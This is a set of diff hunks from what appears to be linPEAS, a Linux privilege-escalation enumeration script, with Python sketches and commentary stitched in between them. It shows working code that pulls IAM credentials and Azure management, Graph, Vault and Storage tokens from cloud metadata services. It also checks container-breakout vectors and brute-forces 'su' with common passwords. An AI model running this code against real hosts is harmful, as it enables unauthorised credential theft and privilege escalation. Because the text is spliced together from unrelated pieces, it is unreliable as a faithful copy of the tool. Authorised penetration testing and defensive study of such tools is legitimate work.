(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
|
||||
|
||||
#-- SY) Execshield
|
||||
print_list "Execshield enabled? ............ "$NC
|
||||
(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
|
||||
|
||||
#-- SY) SElinux
|
||||
print_list "SELinux enabled? ............... "$NC
|
||||
(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
|
||||
|
||||
#-- SY) Seccomp
|
||||
print_list "Seccomp enabled? ............... "$NC
|
||||
([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
|
||||
|
||||
#-- SY) AppArmor
|
||||
print_list "AppArmor profile? .............. "$NC
|
||||
(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
|
||||
|
||||
#-- SY) AppArmor
|
||||
print_list "User namespace? ................ "$NC
|
||||
if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
|
||||
|
||||
#-- SY) cgroup2
|
||||
print_list "Cgroup2 enabled? ............... "$NC
|
||||
([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
|
||||
|
||||
#-- SY) Gatekeeper
|
||||
if [ "$MACPEAS" ]; then
|
||||
print_list "Gatekeeper enabled? .......... "$NC
|
||||
(spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
|
||||
|
||||
print_list "sleepimage encrypted? ........ "$NC
|
||||
(sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
|
||||
|
||||
print_list "XProtect? .................... "$NC
|
||||
(system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
|
||||
|
||||
print_list "SIP enabled? ................. "$NC
|
||||
csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
|
||||
|
||||
print_list "Connected to JAMF? ........... "$NC
|
||||
warn_exec jamf checkJSSConnection
|
||||
|
||||
print_list "Connected to AD? ............. "$NC
|
||||
dsconfigad -show && echo "" || echo_no
|
||||
fi
|
||||
|
||||
#-- SY) ASLR
|
||||
print_list "Is ASLR enabled? ............... "$NC
|
||||
ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
|
||||
if [ -z "$ASLR" ]; then
|
||||
echo_not_found "/proc/sys/kernel/randomize_va_space";
|
||||
else
|
||||
if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
|
||||
echo ""
|
||||
fi
|
||||
|
||||
#-- SY) Printer
|
||||
print_list "Printer? ....................... "$NC
|
||||
(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
|
||||
|
||||
#-- SY) Running in a virtual environment
|
||||
print_list "Is this a virtual machine? ..... "$NC
|
||||
hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
|
||||
if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then
|
||||
detectedvirt=$(systemd-detect-virt)
|
||||
if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
|
||||
else
|
||||
if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
|
||||
fi
|
||||
|
||||
@@ -149,6 +149,16 @@ checkCreateReleaseAgent(){
}

checkProcSysBreakouts(){
  dev_mounted="No"
  if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then
    dev_mounted="Yes";
  fi

  proc_mounted="No"
  if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then
    proc_mounted="Yes";
  fi

  run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null)
  if ! [ "$run_unshare" = "Yes" ]; then
    run_unshare="No"
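The dev_mounted / proc_mounted flags are rough counts: more than 50 character devices in /dev, or more than 50 numeric PID directories in /proc, is taken to mean the host's /dev or /proc is visible inside the container. A Python sketch of the same heuristic (thresholds copied from the shell above):

```python
import stat
from pathlib import Path

def dev_fully_mounted(threshold=50):
    # Count character devices, like `ls -l /dev | grep -E "^c"` does above.
    char_devs = sum(1 for p in Path("/dev").iterdir()
                    if stat.S_ISCHR(p.lstat().st_mode))
    return char_devs > threshold

def proc_fully_mounted(threshold=50):
    # Count numeric PID directories, like `ls /proc | grep -E "^[0-9]"` does above.
    pids = sum(1 for p in Path("/proc").iterdir() if p.name.isdigit())
    return pids > threshold

print("dev mounted:", dev_fully_mounted(), "- proc mounted:", proc_fully_mounted())
```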
@@ -208,7 +218,7 @@ checkProcSysBreakouts(){
##############################################
containerCheck

print_2title "Container related tools present"
print_2title "Container related tools present (if any):"
command -v docker
command -v lxc
command -v rkt
@@ -216,8 +226,10 @@ command -v kubectl
command -v podman
command -v runc

print_2title "Am I Containered?"
execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
  print_2title "Am I Containered?"
  execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
fi

print_2title "Container details"
print_list "Is this a container? ...........$NC $containerType"
@@ -250,7 +262,7 @@ if echo "$containerType" | grep -qi "docker"; then
  print_2title "Docker Container details"
  inDockerGroup
  print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
  print_list "Looking and enumerating Docker Sockets\n"$NC
  print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
  enumerateDockerSockets
  print_list "Docker version .................$NC$dockerVersion"
  checkDockerVersionExploits
@@ -258,7 +270,7 @@ if echo "$containerType" | grep -qi "docker"; then
  print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
  if [ "$inContainer" ]; then
    checkDockerRootless
    print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
    print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
    echo ""
  fi
  if df -h | grep docker; then
@@ -310,34 +322,35 @@ if [ "$inContainer" ]; then
|
||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
|
||||
|
||||
checkProcSysBreakouts
|
||||
print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
|
||||
print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
if [ "$EXTRA_CHECKS" ]; then
|
||||
print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
fi
|
||||
|
||||
echo ""
|
||||
@@ -377,7 +390,8 @@ if [ "$inContainer" ]; then
  if [ "$(command -v capsh)" ]; then
    capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
  else
    cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
    defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
    cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
    echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
  fi
  echo ""
@@ -90,6 +90,33 @@ check_aws_lambda(){
  fi
}

check_aws_codebuild(){
  is_aws_codebuild="No"

  if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then
    is_aws_codebuild="Yes"
  fi
}

check_az_vm(){
  is_az_vm="No"

  if [ -d "/var/log/azure/" ]; then
    is_az_vm="Yes"

  elif cat /etc/resolv.conf 2>/dev/null | grep -q "search reddog.microsoft.com"; then
    is_az_vm="Yes"
  fi
}

check_az_app(){
  is_az_app="No"

  if [ -d "/opt/microsoft" ] && env | grep -q "IDENTITY_ENDPOINT"; then
    is_az_app="Yes"
  fi
}


check_gcp
print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
@@ -100,10 +127,16 @@ print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Ye
print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_aws_lambda
print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_aws_codebuild
print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_do
print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_ibm_vm
print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_az_vm
print_list "Azure VM? ............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_az_app
print_list "Azure APP? ........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"

echo ""

@@ -313,6 +346,31 @@ if [ "$is_aws_lambda" = "Yes" ]; then
  printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
fi

if [ "$is_aws_codebuild" = "Yes" ]; then
  print_2title "AWS Codebuild Enumeration"

  aws_req=""
  if [ "$(command -v curl)" ]; then
    aws_req="curl -s -f"
  elif [ "$(command -v wget)" ]; then
    aws_req="wget -q -O -"
  else
    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    echo "The addresses are in /codebuild/output/tmp/env.sh"
  fi

  if [ "$aws_req" ]; then
    print_3title "Credentials"
    CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
    URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the beginning
    exec_with_jq eval $aws_req "$URL_CREDS"; echo ""

    print_3title "Container Info"
    METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
    exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
  fi
fi
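The CodeBuild checks above pull the credentials path out of /codebuild/output/tmp/env.sh and query the ECS credentials endpoint. A hedged Python equivalent (the single-quoted env.sh format and the 169.254.170.2 endpoint are taken from the shell snippet above; error handling is minimal):

```python
import re
import requests

# Parse AWS_CONTAINER_CREDENTIALS_RELATIVE_URI out of CodeBuild's env.sh,
# mirroring the grep | cut pipeline used above.
with open("/codebuild/output/tmp/env.sh") as fh:
    match = re.search(r"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI='([^']+)'", fh.read())

if match:
    creds = requests.get(f"http://169.254.170.2{match.group(1)}", timeout=5).json()
    print(creds.get("AccessKeyId"), creds.get("Expiration"))
```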
if [ "$is_do" = "Yes" ]; then
|
||||
print_2title "DO Droplet Enumeration"
|
||||
|
||||
@@ -360,6 +418,7 @@ if [ "$is_ibm_vm" = "Yes" ]; then
    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi

  if [ "$ibm_req" ]; then
    print_3title "Instance Details"
    exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
@@ -373,5 +432,73 @@ if [ "$is_ibm_vm" = "Yes" ]; then
    print_3title "IAM credentials"
    exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
  fi
fi

fi

if [ "$is_az_vm" = "Yes" ]; then
  print_2title "Azure VM Enumeration"

  HEADER="Metadata:true"
  URL="http://169.254.169.254/metadata"
  API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions

  az_req=""
  if [ "$(command -v curl)" ]; then
    az_req="curl -s -f -H '$HEADER'"
  elif [ "$(command -v wget)" ]; then
    az_req="wget -q -O - -H '$HEADER'"
  else
    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi

  if [ "$az_req" ]; then
    print_3title "Instance details"
    exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"

    print_3title "Load Balancer details"
    exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"

    print_3title "Management token"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"

    print_3title "Graph token"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"

    print_3title "Vault token"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"

    print_3title "Storage token"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
  fi
fi

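These curl/wget calls all hit the Azure Instance Metadata Service, which requires the Metadata:true header. A rough Python equivalent of the instance-details request (same endpoint and API version as the shell above; only meaningful when run on an Azure VM):

```python
import requests

IMDS = "http://169.254.169.254/metadata"
HEADERS = {"Metadata": "true"}  # IMDS rejects requests without this header
API_VERSION = "2021-12-13"

resp = requests.get(f"{IMDS}/instance", headers=HEADERS,
                    params={"api-version": API_VERSION}, timeout=5)
print(resp.json()["compute"]["name"])  # e.g. the VM name, if the call succeeds
```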
if [ "$check_az_app" = "Yes" ]; then
|
||||
print_2title "Azure App Service Enumeration"
|
||||
echo "I haven't tested this one, if it doesn't work, please send a PR fixing and adding functionality :)"
|
||||
|
||||
HEADER="secret:$IDENTITY_HEADER"
|
||||
|
||||
az_req=""
|
||||
if [ "$(command -v curl)" ]; then
|
||||
az_req="curl -s -f -H '$HEADER'"
|
||||
elif [ "$(command -v wget)" ]; then
|
||||
az_req="wget -q -O - -H '$HEADER'"
|
||||
else
|
||||
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
|
||||
fi
|
||||
|
||||
if [ "$az_req" ]; then
|
||||
print_3title "Management token"
|
||||
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
|
||||
|
||||
print_3title "Graph token"
|
||||
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
|
||||
|
||||
print_3title "Vault token"
|
||||
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
|
||||
|
||||
print_3title "Storage token"
|
||||
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
|
||||
fi
|
||||
fi
|
||||
|
||||
@@ -95,9 +95,9 @@ if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
  echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
fi

if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
  echo "Current user has other interactive shells running" | sed -${E} "s,.*,${SED_RED},g";
  ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
  echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g";
  ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
fi

else
@@ -214,8 +214,7 @@ if [ "$EXTRA_CHECKS" ]; then
fi

#-- UI) Brute su
EXISTS_SUDO="$(command -v sudo 2>/dev/null)"
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
  print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
  POSSIBE_SU_BRUTE=$(check_if_su_brute);
  if [ "$POSSIBE_SU_BRUTE" ]; then
@@ -228,6 +227,6 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] &&
    printf $GREEN"It's not possible to brute-force su.\n\n"$NC
  fi
else
  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC
  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
fi
print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC

@@ -326,7 +326,7 @@ peass{NFS Exports}
kadmin_exists="$(command -v kadmin)"
klist_exists="$(command -v klist)"
kinit_exists="$(command -v kinit)"
if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
  print_2title "Searching kerberos conf files and tickets"
  print_info "http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory"

@@ -177,7 +177,7 @@ echo ""
##-- IPF) Misconfigured ld.so
if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then
  print_2title "Checking misconfigurations of ld.so"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so"
  if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then
    echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},";
    printf $RED$ITALIC"/etc/ld.so.conf\n"$NC;
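The ld.so check boils down to "does the current user have write access to /etc/ld.so.conf" (and, by extension, the drop-in files under /etc/ld.so.conf.d/, which this sketch adds as an assumption). A small Python version of the same test:

```python
import os
from pathlib import Path

candidates = [Path("/etc/ld.so.conf"), *Path("/etc/ld.so.conf.d").glob("*.conf")]
for path in candidates:
    if path.is_file() and os.access(path, os.W_OK):
        print(f"[!] writable: {path}")  # a writable ld.so config is a likely privesc vector
```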
@@ -74,6 +74,7 @@ THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lsc
|
||||
HELP=$GREEN"Enumerate and search Privilege Escalation vectors.
|
||||
${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors.
|
||||
${GREEN} Checks:
|
||||
${YELLOW} -a${BLUE} Perform all checks: 1 min of processes, su brute, and extra checks.
|
||||
${YELLOW} -o${BLUE} Only execute selected checks (peass{CHECKS}). Select a comma separated list.
|
||||
${YELLOW} -s${BLUE} Stealth & faster (don't check some time consuming checks)
|
||||
${YELLOW} -e${BLUE} Perform extra enumeration
|
||||
@@ -246,7 +247,7 @@ print_support () {
|
||||
| ${BLUE}Do you like PEASS?${GREEN} |
|
||||
|---------------------------------------------------------------------------------|
|
||||
| ${YELLOW}Get the latest version${GREEN} : ${RED}https://github.com/sponsors/carlospolop${GREEN} |
|
||||
| ${YELLOW}Follow on Twitter${GREEN} : ${RED}@carlospolopm${GREEN} |
|
||||
| ${YELLOW}Follow on Twitter${GREEN} : ${RED}@hacktricks_live${GREEN} |
|
||||
| ${YELLOW}Respect on HTB${GREEN} : ${RED}SirBroccoli ${GREEN} |
|
||||
|---------------------------------------------------------------------------------|
|
||||
| ${BLUE}Thank you! ${GREEN} |
|
||||
@@ -527,7 +528,7 @@ STRINGS="$(command -v strings 2>/dev/null)"
|
||||
LDD="$(command -v ldd 2>/dev/null)"
|
||||
READELF="$(command -v readelf 2>/dev/null)"
|
||||
|
||||
shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
|
||||
shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/prl-opengl-switcher.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
|
||||
|
||||
notBackup="/tdbbackup$|/db_hotbackup$"
|
||||
|
||||
@@ -542,7 +543,7 @@ mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier"
|
||||
|
||||
profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|im-config_wayland.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh"
|
||||
|
||||
knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com"
|
||||
